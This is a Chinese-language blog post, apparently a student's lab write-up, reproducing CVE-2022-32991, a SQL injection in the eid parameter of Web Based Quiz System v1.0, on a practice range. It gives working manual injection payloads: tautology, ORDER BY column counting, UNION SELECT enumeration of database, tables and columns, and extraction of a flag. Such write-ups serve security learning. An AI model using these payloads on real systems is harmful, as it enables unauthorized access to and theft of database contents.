靶场随记(week4)

近况小结:

期末全科通过(^-^)V,然后熬过了期末后的为期近一个月所谓的实(shui)践(ke)小学期后,刚回到家,闲来无事,突发奇想想试试之前看到的春秋云镜靶机,进行一下漏洞复现(省的自己再搭环境了)

让我们开始正题吧:

CVE-2022-32991

漏洞情报

Web Based Quiz System v1.0版本存在SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令窃取数据库敏感数据。

依照提示确认了一下存在SQL注入

之战的话考虑直接用sqlmap跑一下

但是出于练习考虑,先进行手注练习

先测试了一下它的各个功能

随便编了一下就直接注册成功了(别输真的嗷)

进入到了welcom页面

观察后考虑到是sql注入的原因,于是从第三个选项开始进行测试

进入到第三项后发现了注入点eid值单引号测试后报错于是开始进行测试

' or ' 1'='1 --%20

爆出所有的用户数据

爆破字段数

爆破到第6时页面报错

'or 1=1 order by 6 --%20

'union select 1,2,3,4,5

发现显示点为3

' union select 1,2,database(),4,5 --%20

爆库名

库名为ctf

爆表名:

'union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema='ctf' --%20

发现flag表

' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name='flag' --%20

爆列名

最后直接获取数据

' union select 1,2,flag,4,5 from flag --%20

至此手注结束

耗时近半个小时


flag{932a9f78-defb-4d08-9011-7b177e89abab}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值